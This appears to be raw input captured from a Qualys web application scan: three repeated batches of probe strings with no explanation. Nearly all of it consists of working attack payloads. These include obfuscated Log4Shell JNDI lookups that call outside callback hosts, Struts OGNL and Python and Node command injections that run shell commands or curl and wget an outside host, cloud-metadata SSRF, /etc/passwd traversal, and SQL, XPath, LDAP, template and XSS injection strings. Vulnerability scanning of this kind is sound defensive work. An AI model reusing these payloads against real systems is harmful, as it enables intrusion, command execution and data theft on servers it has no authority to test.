${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//5ad1cae41bd28e1a6c4b92a4b0da3980d9c75623.18084861393642422.2348887275.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://d915ca2577b3731a79b47fe4600349fed06ed882.18084861393642422.450280390.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//5949e192f86e399df0380f91735e444ce420ea32.18084861393642422.1427370756.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jnd${123%ff:-${123%ff:-i:}}ldap://f1390fce9da2b6e8fcc9d27781812f1d75b2b151.18084861393642422.4088760404.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//e13b06772ea722328e3119a34129e1a50d54b510.18084861393642422.1537494416.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://3de6ea6642ae4355ea486df01004bfc4aaca0667.18084861393642422.2415268386.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://d09d141be67c0875663620ba408001fbb8f7f14d.18084861393642422.80450430.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://6c7cd10a3c084ded59e4a1ae5c37cc9ac92b24b4.18084861393642422.1172694622.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://e69e19890ac42cf83d502597381b87c16e264489.18084861393642422.2355354659.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
68b72630c6ffd51a9492f70deac101e10c80dc17.18084861393642422.13910603.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://d9c5839b3b8063c1fb2738154290c03c3d82c862.18084861393642422.3988134181.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@6e9bf17c8625c806e74eda045d8e16c9e495a5d6.18084861393642422.718431681.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssV9Il6yd9};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
"-qxssXCnU7KrE()-"
1
1
'-qxsskE9k2MXs()-'
1
*/;(function(){qxss3vO26Zjh});/*
1
9 ;(function(){qxsspRSX1js2});//
1
9;(function(){qxss3hcRti1t});//
1
';(function(){qxss1D7OumYa});/**/'
1
qualys(aqxsszC0TXOIo)xyz
1
");(function(){qxssByGTPfR7});/**/"
1
";(function(){qxss7U4779ON});/**/"
javascript:qxss(X2983594564Y1_2Z);
1
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qss4WCJNAVC=7< /script>
1
" onEvent=X2983594564Y1_2Z
1
' onEvent=X2983594564Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssdM8156dR=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(01oNAs9R)
1
_q=random(X2983594564Y1_2Z)
1
_q=random(X2983594564Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2983594564Y1_2Z);
1
" onEvent=X2983594564Y1_2Z
1
' onEvent=X2983594564Y1_2Z
1
_q=random(X2983594564Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(36*1000))
1
1
1
require('child_process').execSync('sleep 37').toString()
1
1
__import__('os').popen('sleep 1').read()
1
__import__('os').popen('sleep 37').read()
1
1
1' + sleep(1*100*Math.sqrt(100)) + '
1' + sleep(37*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(1*1000) + '
1
1
1
1
1'; var djci=sleep(37*1000) + '
1
1
1'; var djci=sleep(37*1000);//
1
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(1)))prime) AND 'qualys'='qualys
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(1)))qualys)-- prime
1' OR (SELECT 1337 FROM (SELECT(SLEEP(37)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(37)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(37))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(37))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(37))qsqli_3333); -- OR"*/
1
1;SELECT sleep(37); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(37))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(37))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:37'--
1');WAITFOR DELAY '00:00:37'--
1
1
1';WAITFOR DELAY '00:00:37'--
1
1);WAITFOR DELAY '00:00:37'--
1
1;WAITFOR DELAY '00:00:37';
1
1WAITFOR DELAY '00:00:37'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1
1" or not(false()) or "true" = "true
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1 or 6248 IS NULL
1
1
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl b271ef1d430ed5f842aa65dccf0fecb42b8e3e0e.18058126393642422.2161731612.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 16f29f41c19c176dedb5e237a493fdbb725abedc.18058126393642422.163573383.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 9688aec8786884fa928bf8174c17eea62b9ab449.18058126393642422.3598750380.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
@pd.core.frame.com.builtins.__import__("os").system("""curl 9696893a353e23e4c58d35ad5c2b727993441280.18058126393642422.2149496512.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 38c4cb64538547fb2bde260f129ee1288b442574.18058126393642422.1899011779.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","5277a05dd7b28a3a550963c336308146c7333f75.18058126393642422.3096600370.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://ced5c15cfe5362e6a6888fc08e7fc11ffddfa8e4.18058126393642422.972985343.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://b1b85e0d2d28283d511886b08b9696dbbcaa013d.18058126393642422.3067026921.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//de6eae69589837182ee4b5be729b320d77f6cc73.18058126393642422.2280739177.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://20be7e139db3a15eab765e34fe02af6195909072.18058126393642422.2564202016.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//ae8721374f9628b52014488b7bcafd39f74b184a.18058126393642422.359868975.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://2fb16af24549af1fb4fc2a9ed3611e6355c4ad49.18058126393642422.3644855437.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//55acf6d5b192a945ceab374de8d4f92f0424d08e.18058126393642422.3182882248.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://7d4cb9a6577eeb6a5cb2fdca5ed2435b08987b00.18058126393642422.2519820573.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://eff39e5d09da495b1187b5c990c330513ceffe07.18058126393642422.783403267.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://2acd6d2bd95b09dd9a3b8b392b5f75ae83c8358e.18058126393642422.1950738451.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://fb2f4f5d5c198a98c39fdce60dc6233be7c62351.18058126393642422.3335929441.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
a1173393292c6d6923a7387cffe9e6e076eaa45b.18058126393642422.3656229769.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://feb4f73d73c305fcd9e1f720386544e87bfcf8af.18058126393642422.2577171057.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@0e17c49f395a7c6b4e53d175979324411e5d9b7b.18058126393642422.3317792496.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssmGuWlm9p};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssszCJ17Q4()-"
1
'-qxss12FJ4e3W()-'
1
*/;(function(){qxss2Zpb0NAi});/*
1
9 ;(function(){qxssXTmabVB4});//
1
9;(function(){qxssZ55BUNMK});//
1
';(function(){qxssgA33S56E});/**/'
1
qualys(aqxssRNY2u2xR)xyz
1
");(function(){qxss3cbwZf1h});/**/"
1
";(function(){qxssFkBcvPhj});/**/"
1
javascript:qxss(X175655196Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
;--
1
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssjUKQsDC3=7< /script>
1
" onEvent=X175655196Y1_2Z
1
' onEvent=X175655196Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssSOn6Xv3r=7")}
1
1">
1
1
"'>
1
1
1
1
1
1 _q_q=random(2ma7S7Wp)
1
_q=random(X175655196Y1_2Z)
1
_q=random(X175655196Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X175655196Y1_2Z);
1
" onEvent=X175655196Y1_2Z
1
' onEvent=X175655196Y1_2Z
1
_q=random(X175655196Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1'; var djci=sleep(29*1000) + '
1
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1
1',0,0);WAITFOR DELAY'00:00:29'--
1');WAITFOR DELAY '00:00:29'--
1
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1
1
1 oR 6248=2491 + 3757
1 or 6248 IS NULL
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl b8f049966257ed759246a97739d7303c4d91f463.18015148393642422.3317873661.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget ca961f91c83c3d986ad2a3d32ff55a5f2f9a6177.18015148393642422.928825359.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl c8d2e783e7d7b668dd9565c1096484c57a4a8b1f.18015148393642422.3086455155.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 2ed1f43aafbfbb935f44ee0741f49c9ccc4fc03e.18015148393642422.3497262761.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl d12ce8585a3a49284ddb031482dc14c64f1c692f.18015148393642422.4202023134.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","e11ee325eec6c1d77fad8592d1203cda6910d7d5.18015148393642422.3602964010.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://4b990bd477900e77f6568fe045a66410610dd75f.18015148393642422.677835888.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://2e483a876a37a0029415adfb5d460b68d7aed71a.18015148393642422.362166989.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//06fcd2311f7d945c049074a046d2dad7f7399abc.18015148393642422.1959126738.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://b0330726f928951e2a12113bf0fe2be0a2d85ea1.18015148393642422.372956653.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//d17b87d54157ccc10aecf039dc40ff71d20c8470.18015148393642422.443335280.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://81dac7df861e37f1a567bf5438ff907a616fbb10.18015148393642422.899687037.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//c707832564e6ca0ac65895a642ab4782b6c9065c.18015148393642422.1110508149.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://fe9ddfb03b19a01d2e2dfa033cb9321b9a4f89c9.18015148393642422.1927630902.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://77ca70c39741eed5f08b572df1b59fea075dafd2.18015148393642422.2479674269.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://8ef51b4118858cdb7391e808b2d4e113bb2d4ee5.18015148393642422.1519277612.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://7b75b3eaba2b1d0519975dc5c215723dacc6ce44.18015148393642422.4109677129.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
f2336abe64a37e123d8ad62344e5d8d531adca9b.18015148393642422.2592613705.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://870ed6363d1dbf174ddf39a49bb1fb969ce754ef.18015148393642422.1149374226.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@ee1be08d93cb1e6a84847315aa4a788617edb6a7.18015148393642422.1273024704.smtphi01.smtp.eu2.qualysperiscope.com.
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1)(|(objectclass=*)
1
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss48vO19ka};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssMQ0E8cvY()-"
1
'-qxss1RNrBTWV()-'
1
*/;(function(){qxss128dBqM9});/*
1
9 ;(function(){qxssYNXN8LyW});//
1
9;(function(){qxss6x3HnQ1n});//
';(function(){qxss6F712JlF});/**/'
1
1
qualys(aqxssmw9Slf5b)xyz
1
");(function(){qxss4mg2S6Qr});/**/"
1
";(function(){qxssgaCX0mrD});/**/"
1
javascript:qxss(X171881004Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
